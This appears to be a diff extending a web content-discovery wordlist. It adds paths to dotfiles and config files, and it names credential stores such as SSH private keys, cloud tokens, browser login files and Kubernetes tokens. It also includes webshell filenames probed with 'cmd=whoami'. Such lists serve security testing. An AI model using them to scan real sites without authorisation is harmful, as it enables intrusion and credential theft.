+.bluemix/pipeline.yaml +.bluemix/pipeline.yml +.bootstraprc +.boto .bower-cache .bower-registry .bower-tmp .bower.json +.bowerrc +.brackets.json +.browserslistrc +.buckconfig +.build .build/ +.buildignore +.buildkite/pipeline.json +.buildkite/pipeline.yaml +.buildkite/pipeline.yml +.buildlog .buildpacks .buildpath .buildpath/ .builds +.bumpversion.cfg .bundle .bundle/ .byebug_history .bz2 .bzr/ .bzr/README +.bzr/branch-format +.bzrignore .c9/ +.c9/metadata/environment/.env .c9revisions/ .cabal-sandbox/ .cache +.cache-main .cache/ +.cane .canna .capistrano .capistrano/ .capistrano/metrics .capistrano/metrics/ .cask +.catalog .cc-ban.txt .cc-ban.txt.bak +.cer +.cert .cfg +.cfg/ .cfignore +.cfm +.cgi +.checkignore .checkstyle +.chef/config.rb +.chef/knife.rb .circleci/ .circleci/.firebase.secrets.json .circleci/.firebase.secrets.json.enc +.circleci/circle.yml .circleci/config.yml +.clang-format +.clang_complete .classpath +.clcbio/ +.clog.toml +.coafile .cobalt +.cocoadocs.yml +.codacy.yml +.codeclimate.json .codeclimate.yml +.codecov.yml +.codefresh/codefresh.yml .codeintel .codekit-cache +.codeship.yaml +.codeship.yml .codio .coffee_history +.coffeelintignore +.cointop/config +.com .compile +.components +.components/ .composer +.composer/auth.json +.composer/composer.json .concrete/DEV_MODE +.concrete/dev_mode +.conda/ +.condarc .conf .config +.config.inc.php.swp .config.php.swp .config/ +.config/configstore/snyk.json .config/filezilla/sitemanager.xml.xml +.config/gatsby/config.json +.config/gatsby/events.json +.config/gcloud/access_tokens.db +.config/gcloud/configurations/config_default +.config/gcloud/credentials +.config/gcloud/credentials.db +.config/karma.conf.coffee +.config/karma.conf.js +.config/karma.conf.ts +.config/pip/pip.conf .config/psi+/profiles/default/accounts.xml +.config/stripe/config.toml +.config/yarn/global/package.json +.config/yarn/global/yarn.lock +.configuration +.configuration.php .configuration.php.swp +.configuration/ .consulo/ .contracts +.controls/ +.cookiecutterrc .coq-native/ +.cordova/config.json .core .coverage +.coveragerc +.coveralls.yml .cpan +.cpan/ .cpanel/ +.cpanel/caches/config/ +.cpanm/ .cpcache/ .cproject .cr/ +.credential +.credentials +.credo.exs +.crt .csdp.cache .cshrc +.csi +.css +.csscomb.json +.csslintrc .csv +.ctags +.curlrc .cvs .cvsignore .dart_tool/ .dat +.data/ +.db .db.xml .db.yaml +.db3 +.dbshell +.dbus/ +.dep.inc +.depend +.dependabot +.deploy/values.yaml .deployignore +.deployment +.deployment-config.json .dev/ .devcontainer +.dir-locals.el .directory +.divzero.log +.do +.doc +.docker +.docker/ +.docker/.env +.docker/config.json +.docker/daemon.json +.docker/laravel/app/.env +.dockercfg .dockerignore +.docs/ +.document +.dotfiles.boto +.drone.jsonnet +.drone.sec +.drone.yaml .drone.yml +.dropbox +.dropbox.attr +.dropbox.cache +.dropbox/ +.ds_store +.dsk .dub +.dummy .dump +.dynamodb/ .eclipse .editorconfig .eggs/ .elasticbeanstalk/ .elb .elc +.elixir_ls/ .emacs .emacs.desktop .emacs.desktop.lock +.emails/ +.ember-cli .empty-folder +.ensime +.ensime_cache/ +.ensime_lucene/ .env +.env-example +.env-sample +.env.backup .env.dev .env.dev.local .env.development.local .env.development.sample +.env.dist .env.docker .env.docker.dev +.env.example +.env.local .env.php .env.prod .env.prod.local +.env.production .env.production.local +.env.sample .env.sample.php +.env.save +.env.stage +.env.test +.env.test.local .env.test.sample +.env.travis .environment +.envrc +.envs +.env~ .error_log +.esdoc.json +.esformatter .eslintcache .eslintignore .eslintrc +.eslintrc.js +.eslintrc.json +.eslintrc.yaml +.eslintrc.yml +.esmtprc .espressostorage .eunit +.evg.yml +.exe +.exercism +.exit.log +.exports .external/ .external/data .externalNativeBuild .externalToolBuilders/ +.externalnativebuild +.externaltoolbuilders/ +.extra +.factorypath .fake/ +.faultread.log +.faultreadkernel.log +.fbprefs .fetch .fhp .filemgr-tmp +.filetree .filezilla/ .filezilla/sitemanager.xml.xml +.finished-upgraders +.firebaserc .fishsrv.pl +.fixtures.yml .flac +.flake8 +.flexLibProperties +.floo +.flooignore .flowconfig +.flv .fontconfig/ .fontcustom-manifest.json +.foodcritic +.fop/ +.forktest.log +.forktree.log +.formatter.exs .forward +.frlog +.fseventsd .ftp .ftp-access +.ftpconfig .ftppass .ftpquota +.functions +.fuse_hidden +.fusebox/ +.gdbinit +.gdrive/token_v2.json .gem +.gem/credentials +.gemfile +.gemrc +.gems +.gemspec +.gemtest +.generators +.geppetto-rc.json .gfclient/ .gfclient/pass +.ghc.environment +.ghci +.gho +.gif .git .git-credentials .git-rewrite/ +.git.json .git/ +.git/COMMIT_EDITMSG +.git/FETCH_HEAD .git/HEAD +.git/branches/ .git/config +.git/description +.git/head +.git/hooks/ +.git/hooks/applypatch-msg +.git/hooks/commit-msg +.git/hooks/post-update +.git/hooks/pre-applypatch +.git/hooks/pre-commit +.git/hooks/pre-push +.git/hooks/pre-rebase +.git/hooks/pre-receive +.git/hooks/prepare-commit-msg +.git/hooks/update .git/index +.git/info/ +.git/info/attributes +.git/info/exclude +.git/info/refs .git/logs/ .git/logs/HEAD +.git/logs/head .git/logs/refs +.git/logs/refs/heads +.git/logs/refs/heads/master +.git/logs/refs/remotes +.git/logs/refs/remotes/origin +.git/logs/refs/remotes/origin/HEAD +.git/logs/refs/remotes/origin/master +.git/objects/ +.git/objects/info/packs +.git/packed-refs +.git/refs/ +.git/refs/heads +.git/refs/heads/master +.git/refs/remotes +.git/refs/remotes/origin +.git/refs/remotes/origin/HEAD +.git/refs/remotes/origin/master +.git/refs/tags .git2/ .git_release .gitattributes +.gitchangelog.rc .gitconfig +.github/ +.github/ISSUE_TEMPLATE.md +.github/PULL_REQUEST_TEMPLATE.md +.github/workflows/blank.yml +.github/workflows/ci.yml +.github/workflows/dependabot.yml +.github/workflows/docker.yml +.github/workflows/master.yml +.github/workflows/maven.yml +.github/workflows/nodejs.yml +.github/workflows/publish.yml .gitignore +.gitignore.orig .gitignore.swp +.gitignore/ .gitignore_global .gitignore~ .gitk .gitkeep .gitlab +.gitlab-ci.off.yml .gitlab-ci.yml +.gitlab-ci/.env .gitlab/issue_templates .gitlab/merge_request_templates .gitlab/route-map.yml .gitmodules .gitreview +.gnome/ +.gnupg/ +.gnupg/trustdb.gpg +.godir +.golangci.yml +.google.token +.goreleaser.yml +.goxc.json +.gphoto/ .gradle .gradle/ +.gradle/gradle.properties .gradletasknamecache +.groc.json .grunt .grunt/ .gtkrc .guile_history +.gvimrc .gwt-tmp/ .gwt/ .gz .hash +.hello.log +.helm/repository/repositories.yaml +.helm/values.conf +.helm/values.yaml .hg .hg/ +.hg/branch .hg/dirstate +.hg/hgrc .hg/requires .hg/store/data/ .hg/store/undo .hg/undo.dirstate +.hg_archival.txt .hgignore .hgignore.global .hgrc +.hgsigs +.hgsub +.hgsubstate +.hgtags +.hhconfig .histfile .history +.hound.yml .hpc +.hsdoc .hsenv .ht_wsr.txt .hta @@ -273,11 +626,13 @@ .htaccess.BAK .htaccess.bak .htaccess.bak1 +.htaccess.inc .htaccess.old .htaccess.orig .htaccess.sample .htaccess.save .htaccess.txt +.htaccess/ .htaccessBAK .htaccessOLD .htaccessOLD2 @@ -286,18 +641,29 @@ .htaccess_sc .htaccess~ .htgroup +.htm +.html .htpasswd .htpasswd-old +.htpasswd.bak +.htpasswd.inc +.htpasswd/ .htpasswd_test .htpasswds .httr-oauth .htusers +.hushlogin .hypothesis/ +.ico +.id .idea +.idea.name .idea/ .idea/.name .idea/Sites.iml +.idea/assetwizardsettings.xml .idea/caches +.idea/caches/build_file_checksums.ser .idea/compiler.xml .idea/copyright/profiles_settings.xml .idea/dataSources.ids @@ -308,14 +674,22 @@ .idea/drush_stats.iml .idea/encodings.xml .idea/gradle.xml +.idea/httprequests +.idea/inspectionProfiles/Project_Default.xml .idea/libraries +.idea/libraries/ .idea/misc.xml +.idea/modules .idea/modules.xml +.idea/naveditor.xml +.idea/replstate.xml +.idea/runConfigurations.xml .idea/scopes/scope_settings.xml .idea/sqlDataSources.xml .idea/tasks.xml .idea/uiDesigner.xml .idea/vcs.xml +.idea/webServers.xml .idea/woaWordpress.iml .idea/workspace(2).xml .idea/workspace(3).xml @@ -326,66 +700,137 @@ .idea/workspace.xml .idea0/ .idea_modules/ +.identcache .ignore .ignored/ .import/ +.inc +.inc.php +.indent.pro .index.jsp +.index.php.swp .influx_history .ini +.inputrc .inst/ .install/ .install/composer.phar +.install4j .installed.cfg +.interproscan-5/ +.ionide/ .ipynb_checkpoints +.irb-history +.irb_history +.irbrc +.isort.cfg +.istanbul.yml +.java-buildpack.log +.java-version +.java/ +.jazzy.yaml .jekyll-cache/ .jekyll-metadata +.jenkins.sh +.jenkins.yml +.jenv-version .jestrc +.jobs .joe_state +.jpeg +.jpg .jpilot +.js +.jsbeautifyrc +.jscs.json .jscsrc +.jscsrc.json +.jsdoc.json +.jsdtscope +.jsfmtrc .jshintignore .jshintrc +.jslintrc +.json .jsp .jsp/WEB-INF/classes/Env.java?cmd=whoami&ls=whoami +.jupyter/jupyter_notebook_config.json .k8Jn4gWlqX2c592.jsp +.kdbx .kde +.kdev4/ .keep +.key +.keys .keys.yml +.keys.yml.swp +.kick +.kitchen.cloud.yml +.kitchen.docker.yml +.kitchen.dokken.yml .kitchen.local.yml .kitchen.yml .kitchen/ .komodotools .komodotools/ .ksh_history +.kube/config +.landscape.yaml +.landscape.yml +.lanproxy/config.json .last_cover_stats +.leaky-meta +.learn .lein-deps-sum .lein-failures .lein-plugins/ .lein-repl-history .lesshst +.lgt_tmp/ +.lgtm +.lgtm.yam +.lgtm.yml .lia.cache +.lib/ .libs/ .lighttpd.conf .listing .listings .loadpath .local +.local/ .localcache/ .localeapp/ +.localhistory/ .localsettings.php.swp +.lock .lock-wscript .log .log.txt .login .login_conf +.logout +.luacheckrc +.luacov +.luna/user_info.json +.luna_manager/luna-manager.log +.lvimrc .lynx_cookies +.m/ +.macos .magentointel-cache/ +.magnolia +.magnolia/installer/start .mail_aliases +.mailmap .mailrc .maintenance .maintenance2 +.markdownlint.json +.masterpages/ .mc .mc/ +.mdb .members .memdump .mergesources.yml @@ -393,33 +838,61 @@ .meta .metadata .metadata/ +.meteor/ .metrics +.mfractor/ .modgit/ .modman .modman/ .modules +.mongorc.js .mono/ +.mozilla +.mozilla/ +.mozilla/firefox/logins.json +.mp3 .mr.developer.cfg .msi +.msync.yml .mtj.tmp/ .mtx.jsp .mtx.jsp?cmd=whoami +.muttrc .mvn/timing.properties +.mvn/wrapper/maven-wrapper.jar .mweval_history .mwsql_history .mypy_cache/ +.mysql.txt .mysql_history +.nakignore +.name .nano_history .navigation/ +.nb-gradle/ +.nbgrader.log .nbproject/ .netrc .netrwhist .next +.nfs +.ngrok2/ngrok.yml .nia.cache +.ninja_deps +.ninja_log .nlia.cache +.no-sublime-package +.node-version .node_repl_history .nodelete +.nodemonignore +.nodeset.yml +.nojekyll +.noserc +.nox/ .npm +.npm/ +.npm/anonymous-cli-metrics.json .npmignore .npmrc .nra.cache @@ -429,15 +902,37 @@ .ntvs_analysis.dat .nuget/ .nuget/packages.config +.nuxt +.nv/ +.nvm/ +.nvmrc .nyc_output +.nycrc .o01561023045980.jsp +.ocp-indent +.oh-my-zsh/ .old .oldsnippets .oldstatic +.op/config +.oracle_jre_usage/ .org-id-locations +.ori .ost +.osx +.otto/ +.overcommit.yml +.pac +.pac.pac +.pac/ +.pac/proxy.pac .packages +.pairs .paket/ +.paket/paket.exe +.pallet/services/aws.clj +.pam_environment +.parallel/ .pass .passes .passwd @@ -445,70 +940,155 @@ .passwords .passwrd .patches/ +.path +.pdb .pdf +.pdkignore +.pem +.pep8 .perf +.perlbrew/ +.perltidyrc +.pfx .pgadmin3 +.pgdir.log .pgpass +.pgsql.txt .pgsql_history +.php .php-ini .php-version +.php3 +.php_cs +.php_cs.cache +.php_cs.dist .php_history +.phpcs.xml .phpintel +.phpspec.yml .phpstorm.meta.php .phptidy-cache +.phpunit.result.cache .phpversion +.pip.conf +.pip/pip.conf +.pkgmeta .pki +.pki/ +.pl +.pl-history .placeholder +.playground +.pm2/ +.pmd +.pmtignore +.png +.poggit.yml +.postcssrc.js .powenv +.powrc .pre-commit-config.yaml +.precomp +.prettierignore +.prettierrc +.prettierrc.js +.prettierrc.json +.prettierrc.toml +.prettierrc.yaml +.preview/ +.priority.log +.pro.user .procmailrc +.production .profile +.projdata .project +.project-settings.yml .project.xml .project/ .projectOptions +.projectile +.projections.json .properties +.prospectus +.pry_history +.pryrc .psci .psci_modules .psql_history .psqlrc .pst .pub/ +.publishrc +.pullapprove.yml +.puppet-lint.rc +.puppet/ .pwd +.pwd.lock +.py +.pyc .pydevproject .pylintrc +.pypirc +.pyre/ .pytest_cache/ .python-eggs .python-history .python-version +.python_history +.pyup.yml .qmake.cache +.qmake.conf .qmake.stash .qqestore/ +.rakeTasks .rar .raw +.rbenv-gemsets +.rbenv-version .rbtp .rdsTempFiles +.readthedocs.yml .rebar +.rebar3 +.recommenders +.recommenders/ +.redcar .rediscli_history +.redmine +.reduxrc .reek +.release.json +.remarkrc .remote-sync.json .repl_history +.repo-metadata.json +.reviewboardrc .revision .rhost .rhosts .robots.txt .rocketeer/ .ropeproject +.rpmdb/ +.rpt2_cache/ .rspec +.rspec_parallel .rsync-filter .rsync_cache .rsync_cache/ +.rts2_cache_cjs/ +.rts2_cache_es/ +.rts2_cache_umd/ .rubocop.yml .rubocop_todo.yml .ruby-gemset .ruby-version +.rultor.yml .rvmrc +.s3.yml .s3backupstatus +.s3cfg .s8Jn4gWlqX2c5.jsp?cmd=whoami .s8Jn4gWlqX2c59.jsp .s8Jn4gWlqX2c592.jsp @@ -537,38 +1117,66 @@ .sJn4gWl3l1970.jsp .sJn4gWlqX1c592.jsp .sJn4gWlqX1c592.jsp?cmd=whoami +.sailsrc .sass-cache/ +.sass-lint.yml +.scala_dependencies .scala_history +.scalafmt.conf +.sconf_temp .sconsign.dblite .scrapy +.screenrc .scrutinizer.yml +.scss-lint.yml .selected_editor +.semaphore/semaphore.yaml +.semaphore/semaphore.yml +.semver +.sensiolabs.yml +.sequelizerc +.serverless/ .settings .settings.php.swp .settings/ .settings/.jsdtscope .settings/org.eclipse.core.resources.prefs +.settings/org.eclipse.jdt.core.prefs .settings/org.eclipse.php.core.prefs .settings/org.eclipse.wst.common.project.facet.core.xml .settings/org.eclipse.wst.jsdt.ui.superType.container .settings/org.eclipse.wst.jsdt.ui.superType.name +.settings/rules.json?auth=FIREBASE_SECRET .sh .sh_history .shell.jsp .shell.jsp?cmd=whoami .shell.jspx +.shell.pre-oh-my-zsh .shell123.jsp .shrc +.shtml +.simplecov .sjn4gwl3l191.jsp +.slather.yml .sln +.slugignore +.smalltalk.ston .smileys .smushit-status +.snyk +.softint.log +.spacemacs .spamassassin +.spin.log +.springbeans .spyderproject .spyproject .sql .sql.bz2 .sql.gz +.sqlite +.sqlite3 .sqlite_history .src/app.js .src/index.js @@ -577,8 +1185,13 @@ .ssh.asp .ssh.php .ssh/ +.ssh/ansible_rsa .ssh/authorized_keys +.ssh/config +.ssh/google_compute_engine +.ssh/google_compute_engine.pub .ssh/id_dsa +.ssh/id_dsa.pub .ssh/id_rsa .ssh/id_rsa.key .ssh/id_rsa.key~ @@ -587,86 +1200,228 @@ .ssh/id_rsa.pub .ssh/id_rsa.pub~ .ssh/id_rsa~ +.ssh/identity +.ssh/identity.pub .ssh/know_hosts .ssh/know_hosts~ .ssh/known_host .ssh/known_hosts .st_cache/ .stack-work/ +.stat/ +.stestr.conf +.stickler.yml .style.yapf +.styleci.yml +.stylelintignore .stylelintrc +.stylelintrc.json +.stylintrc +.stylish-haskell.yaml .sublime-gulp.cache .sublime-project .sublime-workspace +.sublimelinterrc .subversion .sucuriquarantine/ +.sudo_as_admin_successful .sunw +.suo .svn .svn/ .svn/all-wcprops .svn/entries +.svn/prop +.svn/text .svn/text-base/ .svn/text-base/index.php.svn-base +.svn/wc.db .svnignore .sw .swf +.swift-version +.swiftlint.yml +.swiftpm .swo .swp +.sync.yml .synthquota .system/ +.tachikoma.yml .tags .tar .tar.bz2 .tar.gz +.target .tconn/ .tconn/tconn.conf +.tcshrc +.teamcity/settings.kts .temp .temp/ +.template-lintrc.js +.templates/ +.temporaryitems +.tern-port +.tern-project +.terraform.d/checkpoint_cache +.terraform.d/checkpoint_signature +.terraform.tfstate.lock.info +.terraform/ +.terraform/modules/modules.json .test.jsp +.testbss.log +.testr.conf +.texlipse .texpadtmp .text2.jsp .tfignore +.tfstate +.tfvars .tgitconfig +.tgz .thumbs +.thunderbird/ .tj.jsp +.tm_properties .tmp +.tmp/ .tmp_versions/ .tmproj +.tmux.conf +.tool-versions +.tools/phpMyAdmin/ +.tools/phpMyAdmin/current/ .tox .tox/ .transients_purge.log +.trash/ +.trashes +.travis.sh .travis.yml +.travis.yml.swp +.travis.yml~ +.travis/ +.travis/config.yml +.travisci.yml +.tugboat .tunnel.jsp +.tvsconfig .tx/ +.tx/config .txt .user.ini .users .vacation.cache .vagrant +.vagrant/ .venv +.verb.md +.verbrc.md .version +.versions .vgextensions/ +.vim.custom +.vim.netrwhist +.vim/ .viminfo .vimrc +.vmware/ .vs/ +.vscode +.vscode/ +.vscode/.env +.vscode/extensions.json +.vscode/ftp-sync.json +.vscode/launch.json +.vscode/settings.json +.vscode/sftp.json +.vscode/tasks.json +.vscodeignore +.vuepress/dist .w.jsp +.w3m/ +.waitkill.log +.watchmanconfig +.watchr .web .web-server-pid .webassets-cache +.well +.well-known/acme-challenge +.well-known/acme-challenge/dtfy +.well-known/apple-app-site-association +.well-known/apple-developer-merchant-domain-association +.well-known/ashrae +.well-known/assetlinks.json +.well-known/browserid +.well-known/caldav +.well-known/carddav +.well-known/core +.well-known/csvm +.well-known/dnt +.well-known/dnt-policy.txt +.well-known/est +.well-known/genid +.well-known/hoba +.well-known/host-meta +.well-known/host-meta.json +.well-known/jwks +.well-known/jwks.json +.well-known/keybase.txt +.well-known/ni +.well-known/openid-configuration +.well-known/openorg +.well-known/posh +.well-known/reload-config +.well-known/repute-template +.well-known/security.txt +.well-known/stun-key +.well-known/time +.well-known/timezone +.well-known/void +.well-known/webfinger +.wget-hsts +.wgetrc +.whitesource +.wm_style +.wmv +.worksheet .workspace/ +.wp-cli/config.yml .wp-config.php.swp +.wp-config.swp .www_acl .wwwacl +.x-formation/ .x3_t.jsp .x4.jsp +.xctool-args +.xhtml +.xinitrc +.xinputrc +.xls +.xml +.xsession +.yamllint .yardoc/ +.yardopts .yarn-integrity +.yarnclean +.yarnrc +.ycm_extra_conf.py +.yield.log .yo-rc.json +.zcompdump-remote-desktop-5.7.1 .zeus.sock .zfs/ .zip +.zprofile .zsh_history +.zshenv .zshrc +.zuul.yaml +.zuul.yml /..; /.DS_Store /.bash_history @@ -1241,6 +1996,7 @@ /fisheye /flex2gateway/amf /flyway +/fs/var/run/secrets/kubernetes.io/serviceaccount/token /ftp.7z /ftp.gz /ftp.rar @@ -1543,6 +2299,7 @@ /shell.jsp /shell.jspx /shell.php +/show_image_NpAdvCatPG.php?cache=false&cat=1&filename= /shutdown /siesta/swagger.json /signin @@ -1863,20 +2620,31 @@ /zf_backend.php /zimbra/ /zipkin +0 0.htpasswd 0.php +00 000.jsp 0000.jsp 0098e0be088433955fa05a1717f360538112339e.jsp 00c86bf6ce026ccfaac955840d18391fbff5c933.jsp +01 013f24efa637d00962abc741457f51a4ee64354c.jsp +02 023.jsp 023.jspx +03 0317bd1d741350d9bc4adbf92801b6a109a57458.jsp 03231be47ca1ca2c31e54d037df6fde6041d9a27.jsp 032c141019ceabee44e013e27d7e77bc4995125a.jsp 03b48a3173a919b51278f38a88b7ef5aca4f7d59.jsp +04 0469aa92db9d69692fef21d502f879a7b2566718.jsp +05 +06 +07 +08 +09 094b96e84e01793e542f8d045af68da015a4a7fc.jsp 0admin/ 0bf6c1e069a14181eb642fa939a059efddc8c82e.jsp @@ -1884,6 +2652,7 @@ 0d4b369f7cba724aaa4962caf463c5cfb915a141.jsp 0d980bb944a1021431fc0b2d805c5c31994ca486.jsp 0manager/ +1 1.7z 1.htaccess 1.htpasswd @@ -1896,107 +2665,162 @@ 1.tar.gz 1.txt 1.zip +10 10-flannel.conf +100 +1000 +1001 +101 +102 102.jsp +103 108c5eeb85f9a2bfb896a1c42a00978f5770e195.jsp +11 11.jsp 111.jsp 1111.jsp 117eb7a7743d53e767129befd5d2458d1621b23b.jsp +12 1213db93b5e2fdc0a53d41674e7b1ea78876106c.jsp +123 123.jsp 123.php 123.txt 12302.jsp 1234.jsp 123456.jsp +13 13.jsp 13ed85586d47c96d1630d4e5537cf10fde2d939e.jsp +14 1488207531.jsp +15 155c441e853b1c7e3e12b32f39fc30a5d577f818.jsp 1563593777216.jsp 1563595485310.jsp 1573435098159_x3.jsp 1577814153243_x3.jsp 1580984073485_x3.jsp +16 16238e86cf4e913c956dcf804bca86da2f2127f5.jsp +17 +18 183df23142716d5d2fc0ea24bbeeb40eaa8b65c3.jsp +19 198577337426540c3f9ed6947bed89219774379f.jsp +1990 +1991 +1992 +1993 +1994 +1995 +1996 +1997 +1998 +1999 19e30ccd0c4695c76a8d02259a446f109df6ba24.jsp 1_1.jsp 1_3.jsp 1a047f4bdf0334f58e23a77fb8190f74a864fffd.jsp 1a4a93233cf5418af85386b5899a634e5c2919b1.jsp +1admin 1c/ 1e79cae19d42da5aa9813b16456971b4e3d34ac0.jsp 1ndex.jsp 1ogout.jsp 1ogout.jspx +1x1 +2 2.jsp 2.php 2.sql 2.txt +2/issue/createmeta +20 +200 +2000 +2001 +2002 +2003 +2004 +2005 +2006 +2007 +2008 +2009 201.jsp +2010 +2010.%EXT% 2010.sql 2010.tar 2010.tar.bz2 2010.tar.gz 2010.tgz 2010.zip +2011 2011.sql 2011.tar 2011.tar.bz2 2011.tar.gz 2011.tgz 2011.zip +2012 2012.sql 2012.tar 2012.tar.bz2 2012.tar.gz 2012.tgz 2012.zip +2013 2013.sql 2013.tar 2013.tar.bz2 2013.tar.gz 2013.tgz 2013.zip +2014 2014.sql 2014.tar 2014.tar.bz2 2014.tar.gz 2014.tgz 2014.zip +2015 2015.sql 2015.tar 2015.tar.bz2 2015.tar.gz 2015.tgz 2015.zip +2016 2016.sql 2016.tar 2016.tar.bz2 2016.tar.gz 2016.tgz 2016.zip +2017 2017.sql 2017.tar 2017.tar.bz2 2017.tar.gz 2017.tgz 2017.zip +2018 2018.sql 2018.tar 2018.tar.bz2 2018.tar.gz 2018.tgz 2018.zip +2019 2019.sql 2019.tar 2019.tar.bz2 2019.tar.gz 2019.tgz 2019.zip +2020 2020.sql 2020.tar 2020.tar.bz2 @@ -2010,62 +2834,103 @@ 2021.tgz 2021.zip 20614d368b77c3af8dbc61e0bbe472e73fde40b3.jsp +21 +22 +2257 22609061c167befd5c32b0798eb52e89d68c74ef.jsp 22cdab3507ae20c2cab0989a95a83ca6850114e3.jsp 22daf8a156bfb57697e03b4b16f09a743764a3f6.jsp +23 231.jsp +24 246c5e7641edc64246f012f7ec36b1568683528f.jsp +25 25fd4e24575c51600ddbd25479c773af2e17d73b.jsp +26 2637c0522970b6e02d040b305d6bc3826ef58eab.jsp 2640228cb6fb767a53615ca878898feb350139ca.jsp +27 27269b6fcff8ddc3c06322f1f9247d5af3ac6624.jsp 275da720a99ed21fd98953f9ddda7460e5b96e5f.jsp +28 28f0cad6197cce10791a400a28f611b8400a8aec.jsp +29 2F417.jsp 2Fx3.jsp 2a0ffc23374ef902dfb87bd3a5454b9a96e0d0be.jsp 2d0a76576f13c70a3d1a0d8d4e7453382adefdbc.jsp 2eae1d5632e22ac9da64bfdea30ed16876f08af5.jsp 2f7b4343c3b3387546d5ce5815048992beab4645.jsp +2g 2phpmyadmin/ +3 3.jsp 3.php +30 +300 30cf4dccf67c46a6f100818d4d4141c0150b1281.jsp 30dae7c1473b767d44f8e30600891a524ac8dea0.jspx 30fc7ea6d4f7cde66043113e38213361621704b7.jsp +31 31df02361b7af1f74232e63664bf3ad7bf91e233.jsp +32 32008f2507fd97467849c1777516a25acfcb8f05.jsp 3211.jsp 321test2411up.jsp 321testk3ls.jsp 32c3066548f3254ab3d0bc1a3e78ebd774fcef4a.jsp 32ltest28.jsp +33 +34 +35 3593c50508dba517f8eae536688490e975f34fd7.jsp +36 362c4b8a2156b8fade4c83deffe464d1856cd763.jsp 36e91678f1e2887b5524cc7fdc8e6790aa4a378a.jsp +37 37c5e3f810293ab5a645947d3b8b9386c404ccf5.jsp 37ca8aec7ed07d8c6bdcfb2b97416745f7870f7e.jsp +38 3870b31f26975a7cb424eab6521fc9bffc2af580.jsp 38b48a655a53fec64c10fc119e46c443446d6b10.jsp +39 3b05dd031fdbebfa79614b0035c47052ac60b210.jsp 3b28aca8038c7f5362c1d8afbb23efcce86bd10c.jsp 3b46a756478928d13a492dd85b3c30f8ed75f037.jsp 3c546df74e37eff27ab1570241e24e1ace9e56e9.jsp 3e1cd375612c3bde5c4f01bb1839c41a442bca15.jsp 3e6a3482b9db64c2ebe61b23df8422756fce8182.jsp +3g +3rdparty 3t3rN4L.jsp +4 4.php +40 +400 400.jsp +401 402a5dfc90a7a750af6fc4fa96b5e63a105424c0.jsp +403 403.jsp 403403.jsp +404 +404.%EXT% 404.jsp +41 417.jsp 41cf3b413baf202a88541419419e3cd7ea9ab999.jsp +42 +43 43ca670ff08b88b84e7a98e562c80e12070b22dd.jsp +44 +45 +46 46_o01561023045980.jsp +47 4762f36ca01fb9cda2ab559623d2206f401fc0b1.jsp +48 48972f48f93f1cbdb0e4b95753da97ffdb58168f.jsp +49 4a45e4f7ca2bfb1d325d1cff8636d0ece29a4eed.jsp 4b3d36ec426fb0be788ba74a9de3cf22e9c62fde.jsp 4b622f46d5ed22e3b034b13b37cd1580d0c960e4.jsp @@ -2074,7 +2939,12 @@ 4c496b2709989e0667ec04ffa3694d35dcda7306.jsp 4d58bcd197f2b63c8b93239da1da149d10f5cc12.jsp 4efa90145d62e21bfc37023580d455489ff1de37.jsp +4images +5 5.php +50 +500 +51 51a25a3ec9633d02d856e910b3c48f8771d960aa.jsp 51pwn_com.jsp 51pwn_com.jsp?51pwn_com=1 @@ -2082,14 +2952,22 @@ 51pwn_com.jsp?pass=1 51pwn_com1.jsp 51test.jsp +52 520.jsp 5245173e6adf00979006ddc15710ed14366eec86.jsp 52bfc305a6e7e5daa318d664ecfdc19986fa5f4e.jsp 52ed07e55c6e6d640ffc2c6371c585ce063f6329.jsp +53 536d65c8be91fa1d709f4c5a91e1f446e0d250e9.jsp 53b38b2940917f3fb327d71f8aef2ef1d8ce4387.jsp +54 +55 +56 +57 57a8da83b98e475c79f90c50696142f713244e1e.jsp +58 583231786bc1d0ecca7d8d2b083804736a3f0a32.jsp +59 5a52c7ae56830013707cd5ce5fe01614e6c2daf9.jsp 5a9fdaa5ac254828974d0cd1e95d0a7f431e2c72.jsp 5e241d9d3a045d3ade7b6ff6af6c57b149fa356e.jsp @@ -2097,31 +2975,53 @@ 5fabc956f2030f24d1ab2e2fa9c5c95cc301fbc1.jsp 5fd522e996b9858d2913c55ad4e7c374824d4e82.jsp 5ff6df3eb3c25a5e9fc0ea598c0ab85db6512f41.jspx +6 6.php +60 60ccccb207dad4fb29648cb2bf19542d89171851.jsp +61 6121bd4faf3aa1f13ac99df8f6030041ca9d3cc3.jsp 61a9e9eb6b24b46b170f421b1ee358f6a92bcbde.jsp 61ce175758d665502a2f8f24d85537bf415eba84.jsp 61d0434c0ba2bb815a20c5878f9c1ee672b9f61e.jspx +62 +63 +64 +65 650eaa21f4031d7da591ebb68e9fc5ce5c860689.jsp +66 6647a2558627cdaa2b04f157f3dd33e7838fdd3c.jspx +67 6744f627f43f81dbc1a1a682ab3e02a2e50ee682.jspx +68 6888.jsp 689d37bb3f27d2ccea596906248c477f3c880f89.jsp 68fe4d31b82f416fb2d3a32f1cc179060096e8a5.jsp +69 6cf0f458ae8faaabc449509d69531450b2067f3b.jsp 6d965191607e37758232050b5b44ae9380cf9593.jsp 6dd02cccd06d2f442958c0aabdd100260a1c1304.jsp +7 7.php +70 70c3d62344418d4745bd5047ecadfd89271305d6.jsp 70dcd8a49a4e7f529098dadfd2d172b692cd5c93.jspx +71 +72 +73 73bb9a1933da055f3925d91c02b5dc4bd3c83a07.jsp +74 74cc6ab5a85b1ce4fb8c082690833a87209ed9ed.jsp +75 7509ee0248c4c10ed12568e1ba9265ebb2e7d8ad.jsp +76 7628589fcf7bf32067e67f5637445defad71302d.jsp 769e3797df6ab8fffd2cc631aaa68a89e228602f.jsp +77 77110bad5de094ad8416b264937698ba2f767771.jsp 7788.php +78 +79 79e5206d86bee52d8239a732107c9d7fe7779676.jsp 7bcd44594e89bc0e0bdff33c20622316f8490305.jsp 7c0cc71e28f6bab535f516ff035a0c1117261801.jsp @@ -2134,37 +3034,61 @@ 7eb3278d8a711fbf2058be163ed86fd7d5d4ddea.jsp 7edcf582835ca4bdaff2312f00ef53b65e7a3d9c.jsp 7fe11e5f98e9945d0b0790d511b24e740ce5d596.jsp +7z +8 8.php +80 807.jsp +81 +82 +83 8309be5965504adc35f7d29a272494abce47c686.jsp 83a86bcf989dbbd2b9a24e4497bc9d98e212bf73.jsp +84 +85 8576d13e8cd8a824068ffc151d86d591b87a6637.jsp 85fb895d152dfd909895e08f4250d2c92e607dc7.jsp +86 +87 87aa569e2debdb5b38f356b539eb397171b83965.jsp +88 8899.php 889c4d2a173c673e62ceb3f612494a2e99c56bc7.jsp +89 890b58037ee26d9139b393293031c7d485d694f6.jsp 8ce89e73d9ef2d3c53a2eb829f790c5878b5e6f5.jsp 